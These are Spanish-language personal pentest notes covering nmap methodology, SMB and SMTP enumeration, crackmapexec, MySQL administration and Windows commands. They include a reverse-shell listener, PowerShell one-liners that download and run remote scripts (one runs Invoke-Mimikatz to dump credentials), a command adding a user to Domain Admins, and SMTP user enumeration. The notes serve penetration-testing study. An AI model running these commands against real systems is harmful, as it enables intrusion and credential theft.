Pentest#

Un compendio de notas sobre pentest.

Todo está aquí, excepto los temas que tienen su propio archivo:

arduino_esp32.md
docker.md
hacking_android.md
hacking_ios.md
hacking_web.md
hacking_wifi.md
hardware.md
linux.md
- Creando un laboratorio para pentest
- Notas en general sobre Linux

Análisis de binarios#

32 bits vs 64 bits#

Se abre el binario con un visor hexadecimal y se busca lo siguiente:

Si es de 32 bits

PL
50 45 00 00 4C

Si es de 64 bits

PE..dt
50 45 00 00 64 86

Apache#

Obtener versiones#

curl
netcat
telnet

1
curl -I http://google.com

Enumerar carpetas (dirb)#

dirb
gobuster
nmap

1
# Enumerar carpetas con dirb
2
dirb http://sitio.com -o output_file.txt
3

4
# Enumerar carpetas con nmap
5
nmap -Pn -p80 --script http-enum 127.0.0.1

Dirbfile#

1
# clonar repositorio
2
git clone https://github.com/elcaza/dirbfile.git
3

4
# Uso
5
./dirbfile file

Hashes#

Información de hashesh#

https://rhash.sourceforge.net/hashes.php#:~:text=The%2032%2Dbit%20long%20hash,in%20the%20EDonkey%20p2p%20network.

Herramientas útiles#

CRACKMAPEXEC#

1
# Enumerar dominio
2
crackmapexec smb 10.10.10.10
3

4
# Comprobar contraseñas
5
crackmapexec smb 10.10.10.10 -u 'user' -p 'password'
6

7
# Ver recursos compartidos
8
crackmapexec smb 10.10.10.10 -u 'user' -p 'password' --shares

Crunch#

Herramienta para crear diccionarios

Instalación#

1
sudo apt install crunch

Uso#

1
# crunch <min> <max> <charset>
2
crunch 3 6 0123456789 -o list.txt
3
crunch 4 8 123abcdefgh#$% -o list2.txt

More info#

Cyberchef#

Un montón de herramientas para códificar/decodificar

https://gchq.github.io/CyberChef/

smbmap#

1
# Ver recursos compartidos
2
smbmap -H 10.10.10.10
3

4
# Leer algún recurso compartido (preivamente sale)
5
smbmap -H 10.10.10.10 -r Nombre_recurso
6

7
# Descargar un recurso
8
smbmap -H 10.10.10.10 --download Nombre_recurso
9

10
# Leer carpetas/archivos con credenciales
11
smbmap 10.10.10.10 -u 'user' -p 'password' -r Carpeta

Ngrok#

https://ngrok.com/

Passwords#

1
cat passwords_burp.txt | (while read password; do echo -n "carlos" | (while read USERS; do echo $USERS:$password; done); done) > eyewitness.txt

Kioscos Windows#

Comandos útiles#

1
# usuario local
2
whoami
3

4
# hostname
5
hostname
6

7
# version de windows
8
winver
9

10
# Visor de eventos
11
eventvwr

LDAP#

ldap#

1
ldapsearch -h 192.168.100.1 -x -s base namingcontexts

https://bmaupin.github.io/wiki/applications/misc/ldapsearch.html

Metasploit#

Logs#

Problema:

La salida de los comandos en metasploit nos es procesable con << | >>
- Por ejemplo la salida de enum_ssh para filtrar únicamente los usuarios validos

Con spool puedes definir un lugar en que se guardarán todo lo que imprima en pantalla metasploit

1
# Apagar los logs
2
spool off
3

4
# Añadir una ruta en que se harán los logs
5
spool /ruta/para/guardar.log
6

7
# Si lo quieres tener por siempre
8
spool /home/<username>/.msf3/logs/console.log

Más información:

https://blog.rapid7.com/2011/06/25/metasploit-framework-console-output-spooling/

nmap#

Metodología#

1
simple (nmap 2000-10000)
2
    1. simple
3
        nmap -vvv -Pn --max-retries 1 --top-ports 10000 -iL ips.txt -oA s1_proyecto_10000
4
        correr: script para sacar puertos únicos
5
    2. simple de versiones
6
        nmap -vvv -sV -Pn --max-retries 1 -p <list_ports> -iL ips.txt -oA s2_sv_proyecto_10000
7
    3. simple de vulnes
8
        nmap -vvv -sV -sC -Pn --max-retries 1 -p <list_ports> -iL ips.txt -oA s3_sv_sc_proyecto_10000
9
        correr: script para remover puertos filtrados
10

11
completo (all)
12
    1. completo
13
        nmap -vvv -Pn --max-retries 1 -p- -iL ips.txt -oA c1_proyecto_all
14
        correr: script para sacar puertos únicos
15
    2. completo de versiones
16
        nmap -vvv -sV -Pn --max-retries 1 -p <list_ports> -iL ips.txt -oA c2_sv_proyecto_all
17
    3. completo de vulnes
18
        nmap -vvv -sV -sC -Pn --max-retries 1 -p <list_ports> -iL ips.txt -oA c3_sv_sc_proyecto_10000
19

20
script para sacar puertos únicos
21
    cat file.nmap  | grep open | cut -d "/" -f1 | sort -u | tr "\n" "," && echo;
22

23
script para remover puertos filtrados
24
    sed '/filtered/d' c2_sv_sc_proyecto_all.nmap  > f2_sv_sc_proyecto_all.nmap
25
    sed '/filtered/d' c3_sv_sc_proyecto_all.nmap  > f3_sv_sc_proyecto_all.nmap
26

27
UDP
28
    1. simple
29
        nmap -vvv -sU -Pn --max-retries 1 --top-ports 10000 -iL ips.txt -oA s1_udp_proyecto_10000
30
    2. simple de versiones
31
        nmap -vvv -sU -sV -Pn --max-retries 1 -p <list_ports> -iL ips.txt -oA s2_udp_sv_proyecto_10000
32
    3. simple de vulnes
33
        nmap -vvv -sU -sV -sC -Pn --max-retries 1 -p <list_ports> -iL ips.txt -oA s3_udp_sv_sc_proyecto_10000
34

35

36
otros
37
    cat f2_sv_proyecto_all.nmap | grep open | sort -u

Secuencia#

Corroborar que el host esté arriba, considerar omitir la resolución DNS
- Puede ser con o sin ping
Detección única de puertos (Sin versiones ni nada)
Detección de versiones y vulnerabilidades

Escaneo de un segmento de red#

1
# Escanear un segmento de red
2
nmap -sn 172.27.48.0/24
3

4
# Escanear un segmento de red (varias ips)
5
nmap -sn 172.27.253.0/24 172.27.252.0/29

Descubrimiento rápido#

1
# Escaneo a top ports
2
nmap --max-retries 0 --top-ports 5000 site.com
3
# Escaneo a todos los puertos
4
nmap --max-retries 0 -p- site.com
5
# Escaneo a top ports pero sin hacer ping, toma todos los hosts como vivos
6
nmap --max-retries 0 --top-ports 5000 -P0 site.com
7
# Escaneo a top ports pero sin hacer ping, toma todos los hosts como vivos
8
nmap --max-retries 0 --top-ports 5000 -Pn site.com

Detección de versiones y vulnerabilidades#

1
# Sintaxis básica
2
nmap --max-retries -p 22,80,443,3000 -sV
3

4
# -sV => Mostrar versiones
5
# -O => Identifica S.O.
6
# -p => Define el puerto
7

8
# Identifica vulnerabilidades
9
nmap -sV -p80,443 --script=vulners ip
10

11
# Identifica vulnerabilidades por puerto asociado
12
nmap -p80,8080 –sV –sC ip
13
# -sC => Scripts de vulnerabilidades acorde al puerto analizado
14

15
# Busca vulnerabilidades
16
nmap 192.160.100.1 -Pn -sCV
17

18
# Realizar escaneo completo a los puertos determinados
19
nmap -A -p80,443 ip

Escaneo UDP#

1
# Escaneo a puertos UDP
2
nmap -sU 172.24.16.25

Scripts#

1
# Actualiza la BD de scripts
2
nmap --script-updatedb
3

4
# Localiza los scripts de nmap
5
locate nse | grep script
6

7
# Ayuda sobre el script
8
nmap --script-help=nombre_scrip

Más información:

https://linuxhint.com/stealth_scans_nmap/

Pretty shell#

rlwrap (Historial de comandos)#

1
# Instala rlwrap
2
sudo apt install rlwrap
3

4
# Para capturar la reverse shell
5
rlwrap nc -lp 5000

Python pretty shell#

1
# Una vez que tienes la conexión
2
python -c "import pty; pty.spawn('/bin/bash')"
3

4
# Otra opción es
5
python -c "import pty; pty.spawn('/bin/sh')"

Python#

Servidores web#

1
# Python 3
2
python3 -m http.server 8000
3

4
# Python 2
5
python -m SimpleHTTPServer 7777

SQL#

Asignar permisos#

1
GRANT ALL PRIVILEGES ON mi_base_de_datos.* TO mi_usuario@localhost;
2
FLUSH PRIVILEGES;

Borrar base de datos#

1
DROP DATABASE base_de_datos;

Cambiar password de usuarios sin conocer el password#

1
# Ver versión mysql/mariadb
2
mysql --version
3

4
# Detener mysql
5
sudo systemctl stop mysql
6

7
# Iniciar MySQL sin seguridad
8
sudo mysqld_safe --skip-grant-tables --skip-networking &
9

10
# Iniciar sesión sin contraseña
11
mysql -u root
12

13
# Cambiar password
14
FLUSH PRIVILEGES;
15
ALTER USER 'root'@'localhost' IDENTIFIED BY 'new_password';
16

17
# Otra opción
18
SET PASSWORD FOR 'root'@'localhost' = PASSWORD('new_password');

Ingresar a SQL#

1
sudo mysql -p

Listar usuarios#

1
# Listar usuarios en MySQL
2
SELECT user FROM mysql.user;
3

4
# Listar usuarios y hosts
5
SELECT user,host FROM mysql.user;
6

7
# Listar usuarios, hosts y password
8
SELECT user,host,password FROM mysql.user;
9

10
# Show Current and Current Logged Users
11
SELECT current_user();
12

13
# If you need more information, you can modify the query to display currently logged-in users with their states
14
SELECT user,host, command FROM information_schema.processlist;

Listar Bases de datos y ver permisos#

1
# Ver bases de datos
2
SHOW DATABASES;
3
SHOW SCHEMAS;

Listar permisos#

1
# Ver permisos de una BD en especifico
2
SELECT user,host from mysql.db where db='DB_NAME';
3

4
# Ver privilegios de todos los usuarios
5
SELECT user, host, password, select_priv, insert_priv, shutdown_priv, grant_priv FROM mysql.user;
6

7
# Ver permisos para BD individuales
8
SELECT user, host, db, select_priv, insert_priv, grant_priv FROM mysql.db;
9

10
# Ver privilegios
11
SHOW grants;

Respaldar una BD#

1
# Crear respaldo de la BD
2
mysqldump -u nombre_usuario -p nombre_bbdd > nombre_archivo_dump.sql

Importar una BD#

1
# Crear una nueva base de datos
2
CREATE DATABASE nueva_bbdd;
3

4
# Importar una BD
5
mysql -u nombre_usuario -p nueva_bbdd < nombre_archivo_dump.sql;

Referencias:#

RPC (135)#

Script de Python#

https://github.com/SecureAuthCorp/impacket/blob/master/examples/rpcdump.py

1
./rpcdump.py 192.168.100.1

SMB (Server Message Block)#

Detalles#

Puerto 445
Versión SMB 1.0 => Conexión anónima permitida
Windows 2008 en adelante no hay conexión anónima
- La versión SMB 1.0 podría estar habilitada por compatibilidad

Autenticación#

1
# Autenticación anónima
2
smbclient -L 172.27.30.30 -N
3
    # Caso deshabilitado
4
    # Anonymous login successful
5
    #
6
    #         Sharename       Type      Comment
7
    #         ---------       ----      -------
8
    # SMB1 disabled -- no workgroup available
9

10

11
# Autenticación con usuario y contraseña
12
# % separa el usuario del password
13
smbclient -L 172.27.30.30 -U 'user%password'
14
    # Caso login correcto
15
    # Sharename       Type      Comment
16
    #    ---------       ----      -------
17

18
# Recursos compartidos por defecto
19
    #    ADMIN$          Disk      Remote Admin
20
    #    C$              Disk      Default share
21
    #    IPC$            IPC       Remote IPC
22

23

24
    #    NETLOGON        Disk      Logon server share
25
    #    SYSVOL          Disk      Logon server share
26

27
# Recursos compartidos en el caso de usar Windows update
28
    #    UpdateServicesPackages Disk      A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
29
    #    WsusContent     Disk      A network share to be used by Local Publishing to place published content on this WSUS system.
30
    #    WSUSTemp        Disk      A network share used by Local Publishing from a Remote WSUS Console Instance.
31
        # SMB1 disabled -- no workgroup available

Entrada a los directorios#

1
# Entrada a los directorios
2
# Para algunos casos se requiere usuario admin
3
smbclient //172.27.30.30/WsusContent -U 'user%password'
4

5
    # Caso usuario correcto y con privilgios suficientes
6
    # user:~# smbclient //172.27.30.30/C$ -U 'usuarioadmin%password'
7
    # Try "help" to get a list of possible commands.
8
# Una vez en el prompt (smb: \>) usar dir para listar
9
dir
10
    # $Recycle.Bin                      DHS        0  Thu Aug 22 11:50:45 2013
11
    # Documents and Settings            DHS        0  Thu Aug 22 10:48:41 2013
12
    # File.txt                              DR        0  Wed Sep  8 19:08:52 2021
13
    # Program Files                      DR        0  Wed Sep  8 20:30:07 2021
14
    # Program Files (x86)                 D        0  Thu Aug 22 11:39:32 2013
15
    # ProgramData                        DH        0  Wed Sep  8 19:11:24 2021
16
    # Users                              DR        0  Wed Sep  8 19:08:52 2021
17
    # Windows                             D        0  Wed Sep  8 18:52:38 2021
18

19
# Para obtener algun archivo get file
20
get File.txt
21
    # getting file \File.txt of size 0 as READMe.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
22

23
# Para quitar
24
quit
25

26
#####################
27
    # Caso usuario correcto y con privilgios insuficientes
28
    # smbclient //172.27.30.30/WsusContent -U 'user%password'
29
    # tree connect failed: NT_STATUS_ACCESS_DENIED

Para deshabilitar el compartir por defecto mediante llave de registro#

1
# llave para deshabilitar el autoshare (?)
2
# dar de alta double word y en valor 0
3
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\AutoShareWks

SMB vulnes nmap#

1
# SMB
2
nmap 192.168.100.1 -Pn -p 445 -sCV –script vuln

SMTP (Simple Mail Transfer Protocol)#

Puedes conectarte a través de varias herramientas, por ejemplo:

netcat
telnet

Sacar la configuración del servidor#

Requiere que tengas el nombre de dominio, pero este sale en el banner de bienvenida

220 dmzweb.sitio.com ESMTP Sendmail 8.13.5/8.13.5; Mon, 4 Oct 2021 03:20:03 -0400

1
# Con telnet
2
telnet 172.27.254.20 25
3
# Nota el ehlo en lugar de helo
4
# Sustituir dmzweb.sitio.com por el nombre de dominio
5
ehlo dmzweb.sitio.com
6
    # output
7
    # 250-dmzweb.sitio.com Hello [172.31.247.18], pleased to meet you
8
    # 250-ENHANCEDSTATUSCODES
9
    # 250-PIPELINING
10
    # 250-EXPN
11
    # 250-VERB
12
    # 250-8BITMIME
13
    # 250-SIZE
14
    # 250-DSN
15
    # 250-ETRN
16
    # 250-DELIVERBY
17
    # 250 HELP
18
# Para salir
19
quit
20

21
# Con netcat
22
nc 172.27.254.20 25
23
# Nota el ehlo en lugar de helo
24
# Sustituir dmzweb.sitio.com por el nombre de dominio
25
ehlo dmzweb.sitio.com
26
    # output
27
    # 250-dmzweb.sitio.com Hello [172.31.247.18], pleased to meet you
28
    # 250-ENHANCEDSTATUSCODES
29
    # 250-PIPELINING
30
    # 250-EXPN
31
    # 250-VERB
32
    # 250-8BITMIME
33
    # 250-SIZE
34
    # 250-DSN
35
    # 250-ETRN
36
    # 250-DELIVERBY
37
    # 250 HELP
38
# Para salir
39
quit

Enumerar cuentas de usuarios#

1
nc 172.27.254.20 25
2
# Nota el helo en lugar de ehlo
3
helo dmzweb.sitio.com
4
# Para enumerar se uso EXPN username
5
EXPN usuario1
6
    # Output
7
    # 550 5.1.1 usuario1... User unknown
8
EXPN root
9
    # 250 2.1.5 Nombre Apellido <usuario@dmzweb.sitio.com>
10
EXPN webmaster
11
    # 250 2.1.5 Nombre Apellido <usuario@dmzweb.sitio.com>

Enviar correos sin autenticación#

Tienes que tener una cuenta valida de correo

1
EXPN root
2
    # 250 2.1.5 Nombre ap <usuario.servidor@dmzweb.sitio.com>
3
mail from: usuario.servidor@dmzweb.sitio.com
4
    # 250 2.1.0 usuario.servidor@dmzweb.sitio.com... Sender ok
5
rcpt to: user@gmail.com
6
    # 250 2.1.5 user@gmail.com... Recipient ok
7
data
8
    # 354 Enter mail, end with "." on a line by itself
9
Subject: El asunto
10
Mensaje del email, terminando con un punto
11
.
12
# 250 2.0.0 1947Mnyw018712 Message accepted for delivery

Tareas en segundo plano y asincronas#

Con funciones#

1
#!/usr/bin/bash
2
delayed_curl() {
3
  url=$1
4
  callback=$2
5
  seconds=$3
6

7
  sleep $seconds
8
  curl -s $url || $callback $url
9
}
10

11
loggin_error() {
12
  echo "error in: $1" >> error.log
13
}
14

15
for delay in 1 5 10; do
16
  echo $delay
17
  delayed_curl "www.asjdlfjsdf.com" loggin_error $delay &
18
  delayed_curl "https://webhook.site/0cd769e1-20ce-4b42-aa10-2e580fef6a26" loggin_error $delay &
19
done

En una sola línea#

1
time sleep 5 && curl -s "https://webhook.site/0cd769e1-20ce-4b42-aa10-2e580fef6a26" && echo "Ready! `date`" & echo "Comenzando (se imprime primero) `date`"
2

3
# Output:
4
    # [1] 1156018
5
    # Comenzando (se imprime primero) jue 29 jun 2023 09:11:35 CST
6
    # real  0m5.002s
7
    # user  0m0.002s
8
    # sys  0m0.000s
9
    # Ready! jue 29 jun 2023 09:11:41 CST

WiFi#

Escanear redes#

1
# Ecacenar interfaz
2
# iwlist <interfaz> scan | grep SSID
3
iwlist wlan0 scan | grep SSID
4
    # ESSID:"Red 1"
5
    # ESSID:"Red 2"

Windows#

Descargar archivos#

Requiere administrador

1
# Metodo 1 - Download in PowerShell 2 ^
2
$WebClient = New-Object System.Net.WebClient
3
$WebClient.DownloadFile("https://raw.githubusercontent.com/elcaza/pentest/main/README.md","C:\path\file")
4

5
# Metodo 2 - Download with Invoke-WebRequest ^
6
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/elcaza/pentest/main/README.md" -OutFile "C:\path\file"
7

8
# Metodo 3 - Download with Invoke-WebRequest ^
9
wget "https://raw.githubusercontent.com/elcaza/pentest/main/README.md" -outfile "file"

Más información:

https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/

Añadir usuario a Dominio#

1
net user username password /ADD /DOMAIN
2
net group "Domain Admins" username /ADD /DOMAIN

Ejecutando un living off the land#

Windows Defender lo detecta como actividad maliciosa

1
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

iex ((New-Object System.Net.WebClient).DownloadString(‘https://git.io/JJ8R4’))

Invoke-Expression (New-Object Net.WebClient).DownloadString(‘http://192.168.100.59:3000/poc.ps1’)

Más información

Obteniendo datos del sistema#

1
REM REM = Comentario en CMD
2
REM Obtener información
3
systeminfo

Artículos interesantes#

https://www.wietzebeukema.nl/blog/bypassing-detections-with-command-line-obfuscation